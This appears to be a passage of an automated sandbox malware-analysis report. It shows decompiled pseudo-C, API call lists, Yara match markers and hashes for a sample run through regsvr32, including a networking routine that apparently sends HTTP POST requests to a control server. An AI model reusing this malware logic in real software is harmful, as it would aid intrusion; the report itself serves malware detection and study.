              • Part of subcall function 027AE503: SysAllocString.OLEAUT32(00000000), ref: 027AE549
              • Part of subcall function 027AE503: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE574
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • SysAllocString.OLEAUT32(00000000), ref: 027AEBF0
            • SysAllocString.OLEAUT32(00000000), ref: 027AEC04
            • SysFreeString.OLEAUT32(?), ref: 027AEF8D
            • SysFreeString.OLEAUT32(?), ref: 027AEF96
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 2e1f7990805e0fc4846f5f6253b252bba49bedba879690996117737b9ab93e32
            • Instruction ID: bbed1ce54bad34ba3ca0db0c68b7f262da464e5f7ae8491a7b73a76e6108cf5e
            • Opcode Fuzzy Hash: 2e1f7990805e0fc4846f5f6253b252bba49bedba879690996117737b9ab93e32
            • Instruction Fuzzy Hash: A3E14271E00219DFDB15DFA4C8A8EEEBBB9FF89320F148669E515A7250DB31A901CF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E6D511F09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				char _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t94;
            				long _t97;
            				void _t105;
            				void* _t112;
            				signed int _t116;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t135;
            				signed int _t136;
            				void* _t137;
            
            				_t78 =  *0x6d55ce08; // 0x70cfd039
            				_v8 = _t78 ^ _t136;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t116 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d55dda0 + _t118 * 4)) + _t116 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t135 = _a4;
            				_v60 = _t86;
            				 *_t135 = 0;
            				 *((intOrPtr*)(_t135 + 4)) = 0;
            				 *((intOrPtr*)(_t135 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x6d55dda0 + _v48 * 4));
            					_t123 =  *(_t129 + _t116 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E6D50ED85(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
            							} else {
            								_t112 = E6D50E99B( &_v28, _t133, 2);
            								_t137 = _t137 + 0xc;
            								if(_t112 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t116 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t94 = E6D50E99B();
            						_t137 = _t137 + 0xc;
            						if(_t94 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t97;
            							if(_t97 != 0) {
            								_t45 =  &_v36; // 0x6d51267e
            								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
            									L19:
            									 *_t135 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t105 = 0xd;
            											_v32 = _t105;
            											_t55 =  &_v36; // 0x6d51267e
            											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				return E6D508B95(_v8 ^ _t136);
            			}

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6D51267E,?,00000000,?,00000000,00000000), ref: 6D511F4B
            • __fassign.LIBCMT ref: 6D511FC6
            • __fassign.LIBCMT ref: 6D511FE1
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6D512007
            • WriteFile.KERNEL32(?,?,00000000,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D512026
            • WriteFile.KERNEL32(?,?,00000001,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D51205F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID: ~&Qm
            • API String ID: 1324828854-113722129
            • Opcode ID: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction ID: d7b25c9e6f02fbe85c1eca361fb5f7fe47f5f04b362a4a26146407471368acc6
            • Opcode Fuzzy Hash: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction Fuzzy Hash: AC51E275A0420A9FEF14CFA8CC85BEEBBF8EF4A300F15455AE951E7681E7309940CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E027B296E(intOrPtr* _a4) {
            				signed int _v8;
            				_Unknown_base(*)()* _v12;
            				char _v16;
            				_Unknown_base(*)()* _t15;
            				void* _t20;
            				intOrPtr* _t25;
            				intOrPtr* _t29;
            				struct HINSTANCE__* _t30;
            
            				_v8 = _v8 & 0x00000000;
            				_t30 = GetModuleHandleW(L"advapi32.dll");
            				if(_t30 == 0) {
            					L7:
            					return 1;
            				}
            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
            				if(_t25 == 0) {
            					goto L7;
            				}
            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
            				_v12 = _t15;
            				if(_t15 == 0) {
            					goto L7;
            				}
            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
            				if(_t29 == 0) {
            					goto L7;
            				}
            				_push(0xf0000000);
            				_push(1);
            				_push(0);
            				_push(0);
            				_push( &_v8);
            				if( *_t25() == 0) {
            					goto L7;
            				}
            				_t20 = _v12(_v8, 4,  &_v16);
            				 *_t29(_v8, 0);
            				if(_t20 == 0) {
            					goto L7;
            				}
            				 *_a4 = E027B28C9( &_v16);
            				return 0;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,027A7C2B), ref: 027B2980
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 027B2998
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 027B29A6
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 027B29B5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: 88a6554b9aa226d7c883b304414a66027a1de8fc819363667ac01546ba4f8c58
            • Instruction ID: cf88cfcb2cb676826d6c20be9502739b1384f01c3b1386f6adc43dd4533b5f0d
            • Opcode Fuzzy Hash: 88a6554b9aa226d7c883b304414a66027a1de8fc819363667ac01546ba4f8c58
            • Instruction Fuzzy Hash: 8E11A572E4131AF7EB239AB88C45FDEB7AD9F44654F110160EF05F2140DB70EA019A54
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E027AF823(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v20;
            				char _v24;
            				intOrPtr _v28;
            				int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v56;
            				int _v68;
            				void* _v72;
            				intOrPtr _v92;
            				int _v96;
            				void* _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				char* _v112;
            				char _v116;
            				char _v132;
            				void _v388;
            				void _v644;
            				intOrPtr _t93;
            				intOrPtr _t94;
            				intOrPtr _t102;
            				signed int _t104;
            				intOrPtr* _t105;
            				intOrPtr _t110;
            				signed int _t111;
            				signed int _t112;
            				intOrPtr _t115;
            				signed int _t116;
            				char _t117;
            				intOrPtr _t119;
            				char _t122;
            				intOrPtr _t127;
            				signed int _t129;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				intOrPtr _t143;
            				intOrPtr _t145;
            				intOrPtr _t147;
            				intOrPtr _t153;
            				intOrPtr _t155;
            				intOrPtr _t159;
            				void* _t163;
            				signed int _t165;
            				void* _t170;
            				intOrPtr _t179;
            				signed int _t186;
            				char _t188;
            				signed int _t189;
            				void* _t190;
            				char _t193;
            				signed int _t194;
            				signed int _t195;
            				void* _t196;
            
            				_v24 = 4;
            				_v32 = 0;
            				_v28 = 1;
            				_t190 = __edx;
            				memset( &_v388, 0, 0x100);
            				memset( &_v644, 0, 0x100);
            				_v56 = E027A9F75(0xab3);
            				_v52 = E027A9F75(0x3f9);
            				_v48 = E027A9F75(0x40f);
            				_t93 = E027A9F75(0x1eb);
            				_t170 = 0x58;
            				_v44 = _t93;
            				_t94 = E027A9F75(_t170);
            				_v36 = _v36 & 0;
            				_t188 = 0x3c;
            				_v40 = _t94;
            				E027A8F0A( &_v116, 0, 0x100);
            				_v108 = 0x10;
            				_v112 =  &_v132;
            				_v116 = _t188;
            				_v100 =  &_v388;
            				_v96 = 0x100;
            				_v72 =  &_v644;
            				_push( &_v116);
            				_push(0);
            				_v68 = 0x100;
            				_push(E027AA5DA(_t190));
            				_t102 =  *0x27bf900; // 0x0
            				_push(_t190);
            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
            					_t104 = 0;
            					__eflags = 0;
            					_v12 = 0;
            					do {
            						_t105 =  *0x27bf900; // 0x0
            						_v8 = 0x8404f700;
            						_t189 =  *_t105( *0x27bf9e8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
            						__eflags = _t189;
            						if(_t189 != 0) {
            							E027AF7BB(_t189);
            							_t110 =  *0x27bf900; // 0x0
            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
            							__eflags = _a24;
            							_t165 = _t111;
            							if(_a24 != 0) {
            								E027AA202(_a24);
            							}
            							__eflags = _t165;
            							if(_t165 != 0) {
            								__eflags = _v104 - 4;
            								_t112 = 0x8484f700;
            								if(_v104 != 4) {
            									_t112 = _v8;
            								}
            								_t115 =  *0x27bf900; // 0x0
            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
            								_v8 = _t116;
            								__eflags = _a24;
            								if(_a24 != 0) {
            									E027AA202(_a24);
            									_t116 = _v8;
            								}
            								__eflags = _t116;
            								if(_t116 != 0) {
            									__eflags = _v104 - 4;
            									if(_v104 == 4) {
            										E027AF769(_t116);
            									}
            									_t117 = E027A9F75(0xfb0);
            									_t193 = _t117;
            									_v16 = _t193;
            									_t119 =  *0x27bf900; // 0x0
            									_t194 = _v8;
            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E027AA5DA(_t193), _a4, _a8);
            									E027A8D2E( &_v16);
            									__eflags = _a24;
            									if(_a24 != 0) {
            										E027AA202(_a24);
            									}
            									__eflags = _v8;
            									if(_v8 != 0) {
            										L25:
            										_t122 = 8;
            										_v24 = _t122;
            										_v20 = 0;
            										_v16 = 0;
            										E027A8F0A( &_v20, 0, _t122);
            										_t127 =  *0x27bf900; // 0x0
            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
            										if(__eflags != 0) {
            											_t129 = E027AA10C( &_v20, __eflags);
            											__eflags = _t129 - 0xc8;
            											if(_t129 == 0xc8) {
            												 *_a20 = _t194;
            												 *_a12 = _t189;
            												 *_a16 = _t165;
            												__eflags = 0;
            												return 0;
            											}
            											_v12 =  ~_t129;
            											L29:
            											_t135 =  *0x27bf900; // 0x0
            											 *((intOrPtr*)(_t135 + 8))(_t194);
            											_t195 = _v12;
            											L30:
            											__eflags = _t165;
            											if(_t165 != 0) {
            												_t139 =  *0x27bf900; // 0x0
            												 *((intOrPtr*)(_t139 + 8))(_t165);
            											}
            											__eflags = _t189;
            											if(_t189 != 0) {
            												_t179 =  *0x27bf900; // 0x0
            												 *((intOrPtr*)(_t179 + 8))(_t189);
            											}
            											return _t195;
            										}
            										GetLastError();
            										_v12 = 0xfffffff8;
            										goto L29;
            									} else {
            										GetLastError();
            										_t143 =  *0x27bf900; // 0x0
            										 *((intOrPtr*)(_t143 + 8))(_t194);
            										_t145 =  *0x27bf900; // 0x0
            										_v8 = _v8 & 0x00000000;
            										 *((intOrPtr*)(_t145 + 8))(_t165);
            										_t147 =  *0x27bf900; // 0x0
            										_t165 = 0;
            										__eflags = 0;
            										 *((intOrPtr*)(_t147 + 8))(_t189);
            										_t194 = _v8;
            										goto L21;
            									}
            								} else {
            									GetLastError();
            									_t153 =  *0x27bf900; // 0x0
            									 *((intOrPtr*)(_t153 + 8))(_t165);
            									_t155 =  *0x27bf900; // 0x0
            									_t165 = 0;
            									 *((intOrPtr*)(_t155 + 8))(_t189);
            									_t189 = 0;
            									_t194 = _v8;
            									goto L22;
            								}
            							} else {
            								GetLastError();
            								_t159 =  *0x27bf900; // 0x0
            								 *((intOrPtr*)(_t159 + 8))(_t189);
            								L21:
            								_t189 = 0;
            								__eflags = 0;
            								goto L22;
            							}
            						}
            						GetLastError();
            						L22:
            						_t186 = _t194;
            						_t104 = _v12 + 1;
            						_v12 = _t104;
            						__eflags = _t104 - 2;
            					} while (_t104 < 2);
            					__eflags = _t186;
            					if(_t186 != 0) {
            						goto L25;
            					}
            					_t195 = 0xfffffffe;
            					goto L30;
            				}
            				_t163 = 0xfffffffc;
            				return _t163;
            			}

            APIs
            • memset.MSVCRT ref: 027AF854
            • memset.MSVCRT ref: 027AF865
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 027AF93A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: fd5df43bb0d973ec57faf45bfc4586f035f6ac0b50a9d22b53f63fc0460c48ea
            • Instruction ID: 314a3bb0fce9d72a9f9b1880630b7e6871113b5f43a4ecd442a644c6efb7d52e
            • Opcode Fuzzy Hash: fd5df43bb0d973ec57faf45bfc4586f035f6ac0b50a9d22b53f63fc0460c48ea
            • Instruction Fuzzy Hash: C1A13975900218AFDB12DFA8D898FAEB7B9FF88320F14456AF905E7250DB349A40CF51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: ec8ee26e0bcfbc7e7cea6310f245d54c3f337311b43613b56d8c3e29c39f30a7
            • Instruction ID: 13222f7d3246135a74c0503340c66747983a35c0b1ddd7de4bb77611da902126
            • Opcode Fuzzy Hash: ec8ee26e0bcfbc7e7cea6310f245d54c3f337311b43613b56d8c3e29c39f30a7
            • Instruction Fuzzy Hash: 8EE16BB190020AAFEF139EA4CC56FEF3B69EF45344F948025FD19A6141E731DA618FA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E027A4FE8(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
            				void _v532;
            				char _v548;
            				char _v580;
            				char _v584;
            				short _v588;
            				WCHAR* _v592;
            				WCHAR* _v596;
            				intOrPtr _v600;
            				char _v628;
            				char _v632;
            				void* __ebx;
            				void* __esi;
            				short _t47;
            				WCHAR* _t54;
            				WCHAR* _t55;
            				intOrPtr _t56;
            				signed int _t61;
            				void* _t65;
            				void* _t66;
            				WCHAR* _t67;
            				intOrPtr _t68;
            				WCHAR* _t70;
            				intOrPtr _t71;
            				WCHAR* _t73;
            				WCHAR* _t83;
            				intOrPtr _t84;
            				void* _t85;
            				intOrPtr _t86;
            				void* _t93;
            				intOrPtr _t94;
            				intOrPtr _t96;
            				void* _t99;
            				void* _t100;
            				WCHAR* _t101;
            				void* _t112;
            				WCHAR* _t116;
            				intOrPtr _t127;
            				void* _t128;
            				void* _t146;
            				WCHAR* _t149;
            				void* _t150;
            				void* _t152;
            				void* _t156;
            				WCHAR* _t157;
            				WCHAR* _t159;
            				signed int _t160;
            				signed int _t161;
            				intOrPtr* _t163;
            				signed int _t165;
            				void* _t168;
            				void* _t169;
            				intOrPtr* _t170;
            				void* _t175;
            
            				_t175 = __fp0;
            				_push(_t160);
            				_t99 = __edx;
            				_t156 = __ecx;
            				_t161 = _t160 | 0xffffffff;
            				memset( &_v532, 0, 0x20c);
            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
            				_v592 = 1;
            				if(_t156 != 0) {
            					_t94 =  *0x27bf8e4; // 0x47ffc00
            					_t96 =  *0x27bf8e8; // 0x47ffab0
            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
            				}
            				if(E027ACB96(_t156) != 0) {
            					L4:
            					_t47 = E027AC86B();
            					_push(_t99);
            					_v588 = _t47;
            					E027AC65E(_t47,  &_v580, _t173, _t175);
            					_t100 = E027A4FA4( &_v580,  &_v580, _t173);
            					_t112 = E027AE3C8( &_v580, E027AA5DA( &_v580), 0);
            					E027AC881(_t112,  &_v548, _t175);
            					_push(_t112);
            					_t54 = E027A311B(_t156,  &_v580, _t173, _t175);
            					_v596 = _t54;
            					if(_t54 != 0) {
            						_push(0);
            						_push(_t100);
            						_push(0x27bc9d8);
            						_t55 = E027A9BF7(_t54);
            						_t169 = _t168 + 0x10;
            						_t101 = _t55;
            						__eflags = _v592;
            						if(__eflags != 0) {
            							_t56 = E027A9A5A(_v596);
            							_t116 = _t101;
            							 *0x27bf9a0 = _t56;
            							 *0x27bf998 = E027A9A5A(_t116);
            							L12:
            							_push(_t116);
            							_t157 = E027AA7D0( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
            							_t170 = _t169 + 0x10;
            							__eflags = _t157;
            							if(_t157 == 0) {
            								goto L36;
            							}
            							_push(0x27bca26);
            							_t146 = 0xe;
            							E027AAC40(_t146, _t175);
            							E027AAC79(_t157, _t175, _t101);
            							_t163 = _a4;
            							_push( *_t163);
            							E027AAC1B(0xb);
            							_t148 =  *(_t163 + 0x10);
            							__eflags =  *(_t163 + 0x10);
            							if( *(_t163 + 0x10) != 0) {
            								E027AB1C2(_t148, _t175);
            							}
            							_t149 =  *(_t163 + 0xc);
            							__eflags = _t149;
            							if(_t149 != 0) {
            								E027AB1C2(_t149, _t175);
            							}
            							_t65 = E027AA202(0);
            							_push(_t149);
            							_t150 = 2;
            							_t66 = E027AABED();
            							__eflags = _v592;
            							_t127 = _t65;
            							if(_v592 == 0) {
            								_t127 =  *0x27bf8e4; // 0x47ffc00
            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									_t67 = E027B0DFC(_t66, _t101, _t150, _t175, 0, _t101, 0);
            									_t170 = _t170 + 0xc;
            									goto L21;
            								}
            								_t127 = _t127 + 0x228;
            								goto L20;
            							} else {
            								_t68 =  *0x27bf8e4; // 0x47ffc00
            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									L27:
            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
            										_t152 = 0x64;
            										E027AF1DB(_t152);
            									}
            									E027A5603( &_v580, _t175);
            									_t159 = _a8;
            									_t128 = _t127;
            									__eflags = _t159;
            									if(_t159 != 0) {
            										_t71 =  *0x27bf8e4; // 0x47ffc00
            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
            											lstrcpyW(_t159, _t101);
            										} else {
            											_t73 = E027A109A(_t128, 0x1c7);
            											_v596 = _t73;
            											lstrcpyW(_t159, _t73);
            											E027A8D41( &_v596);
            											 *_t170 = "\"";
            											lstrcatW(_t159, ??);
            											lstrcatW(_t159, _t101);
            											lstrcatW(_t159, "\"");
            										}
            									}
            									_t70 = _a12;
            									__eflags = _t70;
            									if(_t70 != 0) {
            										 *_t70 = _v588;
            									}
            									_t161 = 0;
            									__eflags = 0;
            									goto L36;
            								}
            								_t32 = _t68 + 0x228; // 0x47ffe28
            								_t127 = _t32;
            								L20:
            								_t67 = E027A5878(_t127, _t101, __eflags);
            								L21:
            								__eflags = _t67;
            								if(_t67 >= 0) {
            									_t68 =  *0x27bf8e4; // 0x47ffc00
            									goto L27;
            								}
            								_push(0xfffffffd);
            								L6:
            								_pop(_t161);
            								goto L36;
            							}
            						}
            						_t83 = E027AD224(_v588, __eflags);
            						_v596 = _t83;
            						_t84 =  *0x27bf8e0; // 0x47ff8c0
            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
            						__eflags = _t85 - _t161;
            						if(_t85 != _t161) {
            							_t86 =  *0x27bf8e0; // 0x47ff8c0
            							 *((intOrPtr*)(_t86 + 0x30))();
            							E027A8D86( &_v632, _t161);
            							_t116 = _t85;
            							goto L12;
            						}
            						E027A8D86( &_v628, _t161);
            						_t61 = 1;
            						goto L37;
            					}
            					_push(0xfffffffe);
            					goto L6;
            				} else {
            					_t93 = E027A3034( &_v532, _t161, 0x105);
            					_t173 = _t93;
            					if(_t93 == 0) {
            						L36:
            						_t61 = _t161;
            						L37:
            						return _t61;
            					}
            					goto L4;
            				}
            			}

            APIs
            • memset.MSVCRT ref: 027A500A
            • lstrcpyW.KERNEL32 ref: 027A5270
            • lstrcatW.KERNEL32(00000000,?), ref: 027A528E
            • lstrcatW.KERNEL32(00000000,00000000), ref: 027A5292
            • lstrcatW.KERNEL32(00000000,027BCA28), ref: 027A529A
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: e9579eaa2719a18fd51a3c9f738f55dec72a203d90fe1614095f8f974c7e9c76
            • Instruction ID: d0931c0f0c9f9df434609eedbe12680d07b8cab0cd02d925c53e1fdcc3f518cc
            • Opcode Fuzzy Hash: e9579eaa2719a18fd51a3c9f738f55dec72a203d90fe1614095f8f974c7e9c76
            • Instruction Fuzzy Hash: 6171C071B44301ABD716EB24D869F7B73EAAFC4730F144A2EF5159B2C0DB7498048B92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 69%
            			E6D510500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t58;
            				signed int _t60;
            				short* _t62;
            				signed int _t66;
            				short* _t70;
            				int _t71;
            				int _t78;
            				short* _t81;
            				signed int _t87;
            				signed int _t90;
            				void* _t95;
            				void* _t96;
            				int _t98;
            				short* _t101;
            				int _t103;
            				signed int _t106;
            				short* _t107;
            				void* _t110;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x6d55ce08; // 0x70cfd039
            				_v8 = _t49 ^ _t106;
            				_push(__esi);
            				_t103 = _a20;
            				if(_t103 > 0) {
            					_t78 = E6D511DB8(_a16, _t103);
            					_t110 = _t78 - _t103;
            					_t4 = _t78 + 1; // 0x1
            					_t103 = _t4;
            					if(_t110 >= 0) {
            						_t103 = _t78;
            					}
            				}
            				_t98 = _a32;
            				if(_t98 == 0) {
            					_t98 =  *( *_a4 + 8);
            					_a32 = _t98;
            				}
            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					return E6D508B95(_v8 ^ _t106);
            				} else {
            					_t95 = _t54 + _t54;
            					_t85 = _t95 + 8;
            					asm("sbb eax, eax");
            					if((_t95 + 0x00000008 & _t54) == 0) {
            						_t81 = 0;
            						__eflags = 0;
            						L14:
            						if(_t81 == 0) {
            							L36:
            							_t105 = 0;
            							L37:
            							E6D5104E0(_t81);
            							goto L38;
            						}
            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
            						_t121 = _t58;
            						if(_t58 == 0) {
            							goto L36;
            						}
            						_t100 = _v12;
            						_t60 = E6D50CD05(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
            						_t105 = _t60;
            						if(_t105 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t96 = _t105 + _t105;
            							_t87 = _t96 + 8;
            							__eflags = _t96 - _t87;
            							asm("sbb eax, eax");
            							__eflags = _t87 & _t60;
            							if((_t87 & _t60) == 0) {
            								_t101 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t101;
            								if(__eflags == 0) {
            									L35:
            									E6D5104E0(_t101);
            									goto L36;
            								}
            								_t62 = E6D50CD05(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
            								__eflags = _t62;
            								if(_t62 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
            								__eflags = _t105;
